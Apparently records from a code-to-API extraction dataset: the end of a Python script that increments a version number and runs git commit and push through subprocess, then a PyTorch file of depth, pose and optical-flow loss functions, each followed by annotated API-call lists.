version = version.strip()
version = version.replace(pattern0, "")
version = version.replace(pattern1, "")
version = int(version)
version_line = i
print("[find_version] version {}".format(version))
print("[find_version] version_line {}".format(version_line))
# Modify specific line
orig_line = line_arr[version_line]
new_line = orig_line.replace(str(version), str(version + 1))
line_arr[version_line] = new_line
# Write everythin again
with open(filename, 'w') as file:
file.writelines(line_arr)
def test_subprocess():
cmd = ['python', '--`version']
# result = subprocess.run(cmd, stdout=subprocess.PIPE)
# result = subprocess.run(cmd, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
result = subprocess.run(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# result = subprocess.run(cmd, capture_output=True)
# print('cmd %s result %s' % (cmd, result))
print('result.stdout %s' % result.stdout)
# cmd = 'ls /usr/bin/python'
def check_python3_version():
for i in range(9, 6, -1):
pver = 'python3.%s' % i
cmd = [pver, '--version']
try:
result = subprocess.run(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# print('result.stdout %s' % result.stdout)
_ = result
return pver
except FileNotFoundError:
result = 'FileNotFoundError'
# print('cmd %s result %s' % (cmd, result))
_ = result
return 'No python 3.x found'
def exec_cmd_and_report(cmd_str, decode):
result = subprocess.run(
cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
print('cmd %s' % cmd_str)
print('result.stdout %s' % result.stdout)
if decode:
bstr = result.stdout
result_str = bstr.decode()
print('result_str')
print(result_str)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Operations related to Python venv')
parser.add_argument('--pver', action='store_true',
help='Get highest python3 version')
parser.add_argument('--iacp', action='store_true',
help='Increment version, '
'add any changes, commit and push to repo')
args = parser.parse_args()
if args.pver:
upver = check_python3_version()
print(upver)
if args.iacp:
increment_setup_version()
exec_cmd_and_report(['git', 'status'], decode=True)
exec_cmd_and_report(['git', 'add', '.'], decode=True)
exec_cmd_and_report(['git', 'commit', '-m',
'\"automated commit using iacp\"'], decode=True)
exec_cmd_and_report(['git', 'push'], decode=True)
exec_cmd_and_report(['git', 'status'], decode=True)
|
[
"subprocess.run",
"argparse.ArgumentParser"
] |
[((1479, 1548), 'subprocess.run', 'subprocess.run', (['cmd'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (1493, 1548), False, 'import subprocess\n'), ((2374, 2447), 'subprocess.run', 'subprocess.run', (['cmd_str'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (2388, 2447), False, 'import subprocess\n'), ((2708, 2780), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Operations related to Python venv"""'}), "(description='Operations related to Python venv')\n", (2731, 2780), False, 'import argparse\n'), ((1921, 1990), 'subprocess.run', 'subprocess.run', (['cmd'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (1935, 1990), False, 'import subprocess\n')]
|
# Author: <NAME>
# Copyright (c) 2019, <NAME>
# All rights reserved.
# based on github.com/ClementPinard/SfMLearner-Pytorch
import torch
from torch import nn
from torch.autograd import Variable
from inverse_warp import inverse_warp, flow_warp
from ssim import ssim
from process_functions import depth_occlusion_masks,occlusion_masks
from utils import robust_l1,logical_or,weighted_binary_cross_entropy
from utils import tensor2array
import matplotlib.pyplot as plt
#loss1 E_R recunstruction loss
def photometric_reconstruction_loss(tgt_img, ref_imgs, intrinsics, intrinsics_inv, depth, explainability_mask, pose, rotation_mode='euler', padding_mode='zeros', lambda_oob=0, qch=0.5, wssim=0.5):
def one_scale(depth, explainability_mask, occ_masks):
assert(explainability_mask is None or depth.size()[2:] == explainability_mask.size()[2:])
assert(pose.size(1) == len(ref_imgs))
reconstruction_loss = 0
b, _, h, w = depth.size()
downscale = tgt_img.size(2)/h
tgt_img_scaled = nn.functional.adaptive_avg_pool2d(tgt_img, (h, w))
ref_imgs_scaled = [nn.functional.adaptive_avg_pool2d(ref_img, (h, w)) for ref_img in ref_imgs]
intrinsics_scaled = torch.cat((intrinsics[:, 0:2]/downscale, intrinsics[:, 2:]), dim=1)
intrinsics_scaled_inv = torch.cat((intrinsics_inv[:, :, 0:2]*downscale, intrinsics_inv[:, :, 2:]), dim=2)
weight = 1.
#
for i, ref_img in enumerate(ref_imgs_scaled):#ref_imgs_scaled: list with 4 items( ref dimention)
current_pose = pose[:, i]
ref_img_warped = inverse_warp(ref_img, depth[:,0], current_pose, intrinsics_scaled, intrinsics_scaled_inv, rotation_mode, padding_mode)
valid_pixels = 1 - (ref_img_warped == 0).prod(1, keepdim=True).type_as(ref_img_warped)#[4,1,h,w]
diff = (tgt_img_scaled - ref_img_warped) * valid_pixels#[4,3,h,w]
ssim_loss = 1 - ssim(tgt_img_scaled, ref_img_warped) * valid_pixels#ssim(a,b)返回同样shape的c,按元素,越相似越接近1, 否则最低为0
oob_normalization_const = valid_pixels.nelement()/valid_pixels.sum()#avg, 根据monodepth改成min??
assert((oob_normalization_const == oob_normalization_const).item() == 1)
if explainability_mask is not None:
diff = diff * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(diff)
ssim_loss = ssim_loss * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(ssim_loss)
else:
diff = diff *(1-occ_masks[:,i:i+1]).expand_as(diff)
ssim_loss = ssim_loss*(1-occ_masks[:,i:i+1]).expand_as(ssim_loss)
reconstruction_loss += (1- wssim)*weight*oob_normalization_const*(robust_l1(diff, q=qch) + wssim*ssim_loss.mean()) + lambda_oob*robust_l1(1 - valid_pixels, q=qch)
assert((reconstruction_loss == reconstruction_loss).item() == 1)
#weight /= 2.83
return reconstruction_loss
if type(explainability_mask) not in [tuple, list]:
explainability_mask = [explainability_mask]
if type(depth) not in [list, tuple]:
depth = [depth]
loss = 0
for d, mask in zip(depth, explainability_mask):
occ_masks = depth_occlusion_masks(d, pose, intrinsics, intrinsics_inv)
loss += one_scale(d, mask, occ_masks)
return loss
def photometric_reconstruction_loss_robust(tgt_img, ref_imgs, intrinsics, intrinsics_inv, depth, explainability_mask, pose, rotation_mode='euler', padding_mode='zeros', lambda_oob=0, qch=0.5, wssim=0.5):
def one_scale(depth, explainability_mask, occ_masks):
assert(explainability_mask is None or depth.size()[2:] == explainability_mask.size()[2:])
assert(pose.size(1) == len(ref_imgs))
reconstruction_loss = 0
b, _, h, w = depth.size()
downscale = tgt_img.size(2)/h
tgt_img_scaled = nn.functional.adaptive_avg_pool2d(tgt_img, (h, w))
ref_imgs_scaled = [nn.functional.adaptive_avg_pool2d(ref_img, (h, w)) for ref_img in ref_imgs]
intrinsics_scaled = torch.cat((intrinsics[:, 0:2]/downscale, intrinsics[:, 2:]), dim=1)
intrinsics_scaled_inv = torch.cat((intrinsics_inv[:, :, 0:2]*downscale, intrinsics_inv[:, :, 2:]), dim=2)
weight = 1.
for i, ref_img in enumerate(ref_imgs_scaled):
current_pose = pose[:, i]
ref_img_warped = inverse_warp(ref_img, depth[:,0], current_pose, intrinsics_scaled, intrinsics_scaled_inv, rotation_mode, padding_mode)
valid_pixels = 1 - (ref_img_warped == 0).prod(1, keepdim=True).type_as(ref_img_warped)
diff = (tgt_img_scaled - ref_img_warped) * valid_pixels
ssim_loss = 1 - ssim(tgt_img_scaled, ref_img_warped) * valid_pixels#ssim(a,b)返回同样shape的c,按元素,越相似越接近1, 否则最低为0
oob_normalization_const = valid_pixels.nelement()/valid_pixels.sum()
assert((oob_normalization_const == oob_normalization_const).item() == 1)
if explainability_mask is not None:
diff = diff * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(diff)
ssim_loss = ssim_loss * (1 - occ_masks[:,i:i+1])* explainability_mask[:,i:i+1].expand_as(ssim_loss)
else:
diff = diff *(1-occ_masks[:,i:i+1]).expand_as(diff)
ssim_loss = ssim_loss*(1-occ_masks[:,i:i+1]).expand_as(ssim_loss)
reconstruction_loss += (1- wssim)*weight*oob_normalization_const*(robust_l1(diff, q=qch) + wssim*ssim_loss.mean()) + lambda_oob*robust_l1(1 - valid_pixels, q=qch)
assert((reconstruction_loss == reconstruction_loss).item() == 1)
#weight /= 2.83
return reconstruction_loss
if type(explainability_mask) not in [tuple, list]:
explainability_mask = [explainability_mask]
if type(depth) not in [list, tuple]:
depth = [depth]
loss = 0
for d, mask in zip(depth, explainability_mask):
occ_masks = depth_occlusion_masks(d, pose, intrinsics, intrinsics_inv)
loss += one_scale(d, mask, occ_masks)
return loss
#loss2 E_M
def explainability_loss(mask):
'''
mask 面积越大, 损失越大
:param mask:
:return:
'''
if type(mask) not in [tuple, list]:
mask = [mask]
loss = 0
for mask_scaled in mask:
ones_var = torch.ones(1).expand_as(mask_scaled).type_as(mask_scaled)
loss += nn.functional.binary_cross_entropy(mask_scaled, ones_var)
return loss
#loss_3 E_S smooth loss
def smooth_loss(pred_disp):
def gradient(pred):
D_dy = pred[:, :, 1:] - pred[:, :, :-1]
D_dx = pred[:, :, :, 1:] - pred[:, :, :, :-1]
return D_dx, D_dy
if type(pred_disp) not in [tuple, list]:
pred_disp = [pred_disp]
loss = 0
weight = 1.
for scaled_disp in pred_disp:
dx, dy = gradient(scaled_disp)
dx2, dxdy = gradient(dx)
dydx, dy2 = gradient(dy)
loss += (dx2.abs().mean() + dxdy.abs().mean() + dydx.abs().mean() + dy2.abs().mean())*weight
weight /= 2.3 # 2sqrt(2)
return loss
#loss4 E_f, flow_loss
def photometric_flow_loss(tgt_img, ref_imgs, flows, explainability_mask, lambda_oob=0, qch=0.5, wssim=0.5):
'''
call: occlusion mask:通过光流反解ref,计算差异性损失
aug:
flows:[flow_fwd,flow_bwd]
flow_fwd/list
list
|--0:tensor:[4,2,128,512]
...
|--5:tensor:[4,2,4,16]
....
explainability_mask:flow_exp_mask
|--0:tensor:[4,2,128,512]
....
'''
def one_scale(explainability_mask, occ_masks, flows):
assert(explainability_mask is None or flows[0].size()[2:] == explainability_mask.size()[2:])
assert(len(flows) == len(ref_imgs))
reconstruction_loss = 0
b, _, h, w = flows[0].size()
downscale = tgt_img.size(2)/h
tgt_img_scaled = nn.functional.adaptive_avg_pool2d(tgt_img, (h, w))
ref_imgs_scaled = [nn.functional.adaptive_avg_pool2d(ref_img, (h, w)) for ref_img in ref_imgs]
weight = 1.
for i, ref_img in enumerate(ref_imgs_scaled):
current_flow = flows[i]
ref_img_warped = flow_warp(ref_img, current_flow)#fomulate 48 w_c
valid_pixels = 1 - (ref_img_warped == 0).prod(1, keepdim=True).type_as(ref_img_warped)
diff = (tgt_img_scaled - ref_img_warped) * valid_pixels
ssim_loss = 1 - ssim(tgt_img_scaled, ref_img_warped) * valid_pixels
oob_normalization_const = valid_pixels.nelement()/valid_pixels.sum()
if explainability_mask is not None:
diff = diff * explainability_mask[:,i:i+1].expand_as(diff)
ssim_loss = ssim_loss * explainability_mask[:,i:i+1].expand_as(ssim_loss)
if occ_masks is not None:
diff = diff *(1-occ_masks[:,i:i+1]).expand_as(diff)
ssim_loss = ssim_loss*(1-occ_masks[:,i:i+1]).expand_as(ssim_loss)
reconstruction_loss += (1- wssim)*weight*oob_normalization_const*(robust_l1(diff, q=qch) + wssim*ssim_loss.mean()) + lambda_oob*robust_l1(1 - valid_pixels, q=qch)
#weight /= 2.83
assert((reconstruction_loss == reconstruction_loss).item() == 1)
return reconstruction_loss
if type(flows[0]) not in [tuple, list]:#flows[0] is flow_fwd , a list or no
if explainability_mask is not None:
explainability_mask = [explainability_mask]
flows = [[uv] for uv in flows]
loss = 0
for i in range(len(flows[0])):#根据尺度遍历scales
flow_at_scale = [uv[i] for uv in flows]#flow_at_sacle:list(2):item:tensor:[4,2,128/i^2,512/i^2],2 是向量图的缘故
occ_mask_at_scale_bw, occ_mask_at_scale_fw = occlusion_masks(flow_at_scale[0], flow_at_scale[1])#0:fwd;1:bwd
#occ_mask-at_scale_bw.shape[b,h,w]
occ_mask_at_scale = torch.stack((occ_mask_at_scale_bw, occ_mask_at_scale_fw), dim=1)
# occ_mask_at_scale = None
loss += one_scale(explainability_mask[i], occ_mask_at_scale, flow_at_scale)
return loss
#loss_5 E_C 修改过one_scale loss func
def consensus_depth_flow_mask(explainability_mask, census_mask_bwd, census_mask_fwd, exp_masks_bwd_target, exp_masks_fwd_target, THRESH, wbce):
# Loop over each scale
def one_scale(explainability_mask, census_mask_bwd, census_mask_fwd, exp_masks_bwd_target, exp_masks_fwd_target, THRESH, wbce):
#for i in range(len(explainability_mask)):
#exp_mask_one_scale = explainability_mask
census_mask_fwd_one_scale = (census_mask_fwd < THRESH).type_as(explainability_mask).prod(dim=1, keepdim=True)
census_mask_bwd_one_scale = (census_mask_bwd < THRESH).type_as(explainability_mask).prod(dim=1, keepdim=True)
#census_mask_bwd_one_scale:tensor[b,1,h,w]
#Using the pixelwise consensus term
exp_fwd_target_one_scale = exp_masks_fwd_target
exp_bwd_target_one_scale = exp_masks_bwd_target
census_mask_fwd_one_scale = logical_or(census_mask_fwd_one_scale, exp_fwd_target_one_scale)
census_mask_bwd_one_scale = logical_or(census_mask_bwd_one_scale, exp_bwd_target_one_scale)
# OR gate for constraining only rigid pixels
# exp_mask_fwd_one_scale = (exp_mask_one_scale[:,2].unsqueeze(1) > 0.5).type_as(exp_mask_one_scale)
# exp_mask_bwd_one_scale = (exp_mask_one_scale[:,1].unsqueeze(1) > 0.5).type_as(exp_mask_one_scale)
# census_mask_fwd_one_scale = 1- (1-census_mask_fwd_one_scale)*(1-exp_mask_fwd_one_scale)
# census_mask_bwd_one_scale = 1- (1-census_mask_bwd_one_scale)*(1-exp_mask_bwd_one_scale)
census_mask_fwd_one_scale = Variable(census_mask_fwd_one_scale.data, requires_grad=False)
census_mask_bwd_one_scale = Variable(census_mask_bwd_one_scale.data, requires_grad=False)
rigidity_mask_combined = torch.cat((census_mask_bwd_one_scale, census_mask_bwd_one_scale,
census_mask_fwd_one_scale, census_mask_fwd_one_scale), dim=1)
return weighted_binary_cross_entropy(explainability_mask, rigidity_mask_combined.type_as(explainability_mask), [wbce, 1-wbce])
assert (len(explainability_mask) == len(census_mask_bwd))
assert (len(explainability_mask) == len(census_mask_fwd))
loss = 0.
if type(explainability_mask) not in [tuple, list]:
return one_scale(explainability_mask, census_mask_bwd, census_mask_fwd, exp_masks_bwd_target, exp_masks_fwd_target, THRESH, wbce)
else:
for i in range(len(explainability_mask)):
loss+=one_scale(explainability_mask[i], census_mask_bwd[i], census_mask_fwd[i], exp_masks_bwd_target[i], exp_masks_fwd_target[i], THRESH, wbce)
return loss
#note use
def gaussian_explainability_loss(mask):
if type(mask) not in [tuple, list]:
mask = [mask]
loss = 0
for mask_scaled in mask:
loss += torch.exp(-torch.mean((mask_scaled-0.5).pow(2))/0.15)
return loss
def edge_aware_smoothness_loss(img, pred_disp):
def gradient_x(img):
gx = img[:,:,:-1,:] - img[:,:,1:,:]
return gx
def gradient_y(img):
gy = img[:,:,:,:-1] - img[:,:,:,1:]
return gy
def get_edge_smoothness(img, pred):
pred_gradients_x = gradient_x(pred)
pred_gradients_y = gradient_y(pred)
image_gradients_x = gradient_x(img)
image_gradients_y = gradient_y(img)
weights_x = torch.exp(-torch.mean(torch.abs(image_gradients_x), 1, keepdim=True))
weights_y = torch.exp(-torch.mean(torch.abs(image_gradients_y), 1, keepdim=True))
smoothness_x = torch.abs(pred_gradients_x) * weights_x
smoothness_y = torch.abs(pred_gradients_y) * weights_y
return torch.mean(smoothness_x) + torch.mean(smoothness_y)
loss = 0
weight = 1.
for scaled_disp in pred_disp:
b, _, h, w = scaled_disp.size()
scaled_img = nn.functional.adaptive_avg_pool2d(img, (h, w))
loss += get_edge_smoothness(scaled_img, scaled_disp)
weight /= 2.3 # 2sqrt(2)
return loss
class MaskedMSELoss(nn.Module):
def __init__(self):
super(MaskedMSELoss, self).__init__()
def forward(self, pred, target):
assert pred.dim() == target.dim(), "inconsistent dimensions"
valid_mask = (target>0).detach()
diff = target - pred
diff = diff[valid_mask]
self.loss = (diff ** 2).mean()
return self.loss
class MaskedL1Loss(nn.Module):
'''
空定义,forward
'''
def __init__(self):
super(MaskedL1Loss, self).__init__()
def forward(self, target,pred):
if type(pred) not in [tuple, list]:
pred = [pred]
#assert pred.dim() == target.dim(), "inconsistent dimensions"
loss=0
for scaled_pred,scaled_target in zip( pred,target):
valid_mask = (scaled_target>0).detach()
diff = scaled_target - scaled_pred
diff = diff[valid_mask]
loss += diff.abs().mean()
return loss
class HistgramLoss(nn.Module):
def __init__(self):
super(HistgramLoss, self).__init__()
def forward(self, pred,target):
assert pred.dim() == target.dim(), "inconsistent dimensions"
numel = pred.numel()
pred=pred.detach()
target = target.detach()
gt_h = torch.histc(target.flatten(), bins=256, min=0, max=1).float() / numel
pre_h = torch.histc(pred.flatten(), bins=256, min=0, max=1).float() / numel
diff = gt_h - pre_h
self.loss = diff.abs().mean()
return self.loss*100
class ComputeErrors(nn.Module):
def __init__(self):
super(ComputeErrors, self).__init__()
def forward(self, gt,pred,crop):
gt*=255
pred*=255
abs_diff, abs_rel, sq_rel, a1, a2, a3, epe = 0, 0, 0, 0, 0, 0, 0
batch_size = gt.size(0)
'''
crop used by Garg ECCV16 to reprocude Eigen NIPS14 results
construct a mask of False values, with the same size as target
and then set to True values inside the crop
'''
if crop:
crop_mask = gt[0] != gt[0]
y1, y2 = int(0.40810811 * gt.size(1)), int(0.99189189 * gt.size(1))
x1, x2 = int(0.03594771 * gt.size(2)), int(0.96405229 * gt.size(2))
crop_mask[y1:y2, x1:x2] = 1
for current_gt, current_pred in zip(gt, pred):
valid = (current_gt > 0) & (current_gt < 255)
if crop:
valid = valid & crop_mask
valid_gt = current_gt[valid]
valid_pred = current_pred[valid].clamp(1e-3, 255)
valid_pred = valid_pred * torch.median(valid_gt) / torch.median(valid_pred)
thresh = torch.max((valid_gt / valid_pred), (valid_pred / valid_gt))
a1 += (thresh < 1.25).float().mean()
a2 += (thresh < 1.25 ** 2).float().mean()
a3 += (thresh < 1.25 ** 3).float().mean()
diff = valid_gt - valid_pred
abs_diff += torch.mean(torch.abs(diff))
abs_rel += torch.mean(torch.abs(diff) / valid_gt)
sq_rel += torch.mean((diff ** 2) / valid_gt)
return [metric / batch_size for metric in [abs_diff, abs_rel, sq_rel, a1, a2, a3]]
def compute_errors2(gt, pred, crop=False):
abs_diff, abs_rel, sq_rel, a1, a2, a3,epe = 0, 0, 0, 0, 0, 0,0
batch_size = gt.size(0)
'''
crop used by Garg ECCV16 to reprocude Eigen NIPS14 results
construct a mask of False values, with the same size as target
and then set to True values inside the crop
'''
if crop:
crop_mask = gt[0] != gt[0]
y1, y2 = int(0.40810811 * gt.size(1)), int(0.99189189 * gt.size(1))
x1, x2 = int(0.03594771 * gt.size(2)), int(0.96405229 * gt.size(2))
crop_mask[y1:y2, x1:x2] = 1
for current_gt, current_pred in zip(gt, pred):
valid = (current_gt > 0) & (current_gt < 80)
if crop:
valid = valid & crop_mask
valid_gt = current_gt[valid]
valid_pred = current_pred[valid].clamp(1e-3, 80)
valid_pred = valid_pred * torch.median(valid_gt) / torch.median(valid_pred)
thresh = torch.max((valid_gt / valid_pred), (valid_pred / valid_gt))
a1 += (thresh < 1.25).float().mean()
a2 += (thresh < 1.25 ** 2).float().mean()
a3 += (thresh < 1.25 ** 3).float().mean()
diff = valid_gt - valid_pred
abs_diff += torch.mean(torch.abs(diff))
abs_rel += torch.mean(torch.abs(diff) / valid_gt) * 100
sq_rel += torch.mean((diff ** 2) / valid_gt) * 100
epe+= torch.mean(diff ** 2)
return [metric / batch_size for metric in [abs_diff, abs_rel, sq_rel, a1, a2, a3,epe]]
def VGS_loss(gt,pred):
pass
|
[
"torch.mean",
"process_functions.occlusion_masks",
"torch.nn.functional.binary_cross_entropy",
"torch.median",
"torch.ones",
"torch.stack",
"inverse_warp.flow_warp",
"torch.autograd.Variable",
"utils.logical_or",
"ssim.ssim",
"torch.cat",
"utils.robust_l1",
"torch.nn.functional.adaptive_avg_pool2d",
"process_functions.depth_occlusion_masks",
"inverse_warp.inverse_warp",
"torch.max",
"torch.abs"
] |
[((1030, 1080), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['tgt_img', '(h, w)'], {}), '(tgt_img, (h, w))\n', (1063, 1080), False, 'from torch import nn\n'), ((1212, 1281), 'torch.cat', 'torch.cat', (['(intrinsics[:, 0:2] / downscale, intrinsics[:, 2:])'], {'dim': '(1)'}), '((intrinsics[:, 0:2] / downscale, intrinsics[:, 2:]), dim=1)\n', (1221, 1281), False, 'import torch\n'), ((1312, 1399), 'torch.cat', 'torch.cat', (['(intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:])'], {'dim': '(2)'}), '((intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:]),\n dim=2)\n', (1321, 1399), False, 'import torch\n'), ((3232, 3290), 'process_functions.depth_occlusion_masks', 'depth_occlusion_masks', (['d', 'pose', 'intrinsics', 'intrinsics_inv'], {}), '(d, pose, intrinsics, intrinsics_inv)\n', (3253, 3290), False, 'from process_functions import depth_occlusion_masks, occlusion_masks\n'), ((3892, 3942), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['tgt_img', '(h, w)'], {}), '(tgt_img, (h, w))\n', (3925, 3942), False, 'from torch import nn\n'), ((4074, 4143), 'torch.cat', 'torch.cat', (['(intrinsics[:, 0:2] / downscale, intrinsics[:, 2:])'], {'dim': '(1)'}), '((intrinsics[:, 0:2] / downscale, intrinsics[:, 2:]), dim=1)\n', (4083, 4143), False, 'import torch\n'), ((4174, 4261), 'torch.cat', 'torch.cat', (['(intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:])'], {'dim': '(2)'}), '((intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:]),\n dim=2)\n', (4183, 4261), False, 'import torch\n'), ((5984, 6042), 'process_functions.depth_occlusion_masks', 'depth_occlusion_masks', (['d', 'pose', 'intrinsics', 'intrinsics_inv'], {}), '(d, pose, intrinsics, intrinsics_inv)\n', (6005, 6042), False, 'from process_functions import depth_occlusion_masks, occlusion_masks\n'), ((6412, 6469), 'torch.nn.functional.binary_cross_entropy', 'nn.functional.binary_cross_entropy', (['mask_scaled', 'ones_var'], {}), '(mask_scaled, ones_var)\n', (6446, 6469), False, 'from torch import nn\n'), ((7906, 7956), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['tgt_img', '(h, w)'], {}), '(tgt_img, (h, w))\n', (7939, 7956), False, 'from torch import nn\n'), ((9749, 9800), 'process_functions.occlusion_masks', 'occlusion_masks', (['flow_at_scale[0]', 'flow_at_scale[1]'], {}), '(flow_at_scale[0], flow_at_scale[1])\n', (9764, 9800), False, 'from process_functions import depth_occlusion_masks, occlusion_masks\n'), ((9884, 9948), 'torch.stack', 'torch.stack', (['(occ_mask_at_scale_bw, occ_mask_at_scale_fw)'], {'dim': '(1)'}), '((occ_mask_at_scale_bw, occ_mask_at_scale_fw), dim=1)\n', (9895, 9948), False, 'import torch\n'), ((11002, 11065), 'utils.logical_or', 'logical_or', (['census_mask_fwd_one_scale', 'exp_fwd_target_one_scale'], {}), '(census_mask_fwd_one_scale, exp_fwd_target_one_scale)\n', (11012, 11065), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((11102, 11165), 'utils.logical_or', 'logical_or', (['census_mask_bwd_one_scale', 'exp_bwd_target_one_scale'], {}), '(census_mask_bwd_one_scale, exp_bwd_target_one_scale)\n', (11112, 11165), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((11669, 11730), 'torch.autograd.Variable', 'Variable', (['census_mask_fwd_one_scale.data'], {'requires_grad': '(False)'}), '(census_mask_fwd_one_scale.data, requires_grad=False)\n', (11677, 11730), False, 'from torch.autograd import Variable\n'), ((11767, 11828), 'torch.autograd.Variable', 'Variable', (['census_mask_bwd_one_scale.data'], {'requires_grad': '(False)'}), '(census_mask_bwd_one_scale.data, requires_grad=False)\n', (11775, 11828), False, 'from torch.autograd import Variable\n'), ((11863, 11993), 'torch.cat', 'torch.cat', (['(census_mask_bwd_one_scale, census_mask_bwd_one_scale,\n census_mask_fwd_one_scale, census_mask_fwd_one_scale)'], {'dim': '(1)'}), '((census_mask_bwd_one_scale, census_mask_bwd_one_scale,\n census_mask_fwd_one_scale, census_mask_fwd_one_scale), dim=1)\n', (11872, 11993), False, 'import torch\n'), ((13887, 13933), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['img', '(h, w)'], {}), '(img, (h, w))\n', (13920, 13933), False, 'from torch import nn\n'), ((18166, 18221), 'torch.max', 'torch.max', (['(valid_gt / valid_pred)', '(valid_pred / valid_gt)'], {}), '(valid_gt / valid_pred, valid_pred / valid_gt)\n', (18175, 18221), False, 'import torch\n'), ((18597, 18618), 'torch.mean', 'torch.mean', (['(diff ** 2)'], {}), '(diff ** 2)\n', (18607, 18618), False, 'import torch\n'), ((1108, 1158), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['ref_img', '(h, w)'], {}), '(ref_img, (h, w))\n', (1141, 1158), False, 'from torch import nn\n'), ((1598, 1721), 'inverse_warp.inverse_warp', 'inverse_warp', (['ref_img', 'depth[:, 0]', 'current_pose', 'intrinsics_scaled', 'intrinsics_scaled_inv', 'rotation_mode', 'padding_mode'], {}), '(ref_img, depth[:, 0], current_pose, intrinsics_scaled,\n intrinsics_scaled_inv, rotation_mode, padding_mode)\n', (1610, 1721), False, 'from inverse_warp import inverse_warp, flow_warp\n'), ((3970, 4020), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['ref_img', '(h, w)'], {}), '(ref_img, (h, w))\n', (4003, 4020), False, 'from torch import nn\n'), ((4400, 4523), 'inverse_warp.inverse_warp', 'inverse_warp', (['ref_img', 'depth[:, 0]', 'current_pose', 'intrinsics_scaled', 'intrinsics_scaled_inv', 'rotation_mode', 'padding_mode'], {}), '(ref_img, depth[:, 0], current_pose, intrinsics_scaled,\n intrinsics_scaled_inv, rotation_mode, padding_mode)\n', (4412, 4523), False, 'from inverse_warp import inverse_warp, flow_warp\n'), ((7984, 8034), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['ref_img', '(h, w)'], {}), '(ref_img, (h, w))\n', (8017, 8034), False, 'from torch import nn\n'), ((8202, 8234), 'inverse_warp.flow_warp', 'flow_warp', (['ref_img', 'current_flow'], {}), '(ref_img, current_flow)\n', (8211, 8234), False, 'from inverse_warp import inverse_warp, flow_warp\n'), ((13595, 13622), 'torch.abs', 'torch.abs', (['pred_gradients_x'], {}), '(pred_gradients_x)\n', (13604, 13622), False, 'import torch\n'), ((13656, 13683), 'torch.abs', 'torch.abs', (['pred_gradients_y'], {}), '(pred_gradients_y)\n', (13665, 13683), False, 'import torch\n'), ((13709, 13733), 'torch.mean', 'torch.mean', (['smoothness_x'], {}), '(smoothness_x)\n', (13719, 13733), False, 'import torch\n'), ((13736, 13760), 'torch.mean', 'torch.mean', (['smoothness_y'], {}), '(smoothness_y)\n', (13746, 13760), False, 'import torch\n'), ((16710, 16765), 'torch.max', 'torch.max', (['(valid_gt / valid_pred)', '(valid_pred / valid_gt)'], {}), '(valid_gt / valid_pred, valid_pred / valid_gt)\n', (16719, 16765), False, 'import torch\n'), ((17106, 17138), 'torch.mean', 'torch.mean', (['(diff ** 2 / valid_gt)'], {}), '(diff ** 2 / valid_gt)\n', (17116, 17138), False, 'import torch\n'), ((18123, 18147), 'torch.median', 'torch.median', (['valid_pred'], {}), '(valid_pred)\n', (18135, 18147), False, 'import torch\n'), ((18441, 18456), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (18450, 18456), False, 'import torch\n'), ((18540, 18572), 'torch.mean', 'torch.mean', (['(diff ** 2 / valid_gt)'], {}), '(diff ** 2 / valid_gt)\n', (18550, 18572), False, 'import torch\n'), ((16663, 16687), 'torch.median', 'torch.median', (['valid_pred'], {}), '(valid_pred)\n', (16675, 16687), False, 'import torch\n'), ((17005, 17020), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (17014, 17020), False, 'import torch\n'), ((18098, 18120), 'torch.median', 'torch.median', (['valid_gt'], {}), '(valid_gt)\n', (18110, 18120), False, 'import torch\n'), ((1935, 1971), 'ssim.ssim', 'ssim', (['tgt_img_scaled', 'ref_img_warped'], {}), '(tgt_img_scaled, ref_img_warped)\n', (1939, 1971), False, 'from ssim import ssim\n'), ((2797, 2831), 'utils.robust_l1', 'robust_l1', (['(1 - valid_pixels)'], {'q': 'qch'}), '(1 - valid_pixels, q=qch)\n', (2806, 2831), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((4714, 4750), 'ssim.ssim', 'ssim', (['tgt_img_scaled', 'ref_img_warped'], {}), '(tgt_img_scaled, ref_img_warped)\n', (4718, 4750), False, 'from ssim import ssim\n'), ((5550, 5584), 'utils.robust_l1', 'robust_l1', (['(1 - valid_pixels)'], {'q': 'qch'}), '(1 - valid_pixels, q=qch)\n', (5559, 5584), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((8446, 8482), 'ssim.ssim', 'ssim', (['tgt_img_scaled', 'ref_img_warped'], {}), '(tgt_img_scaled, ref_img_warped)\n', (8450, 8482), False, 'from ssim import ssim\n'), 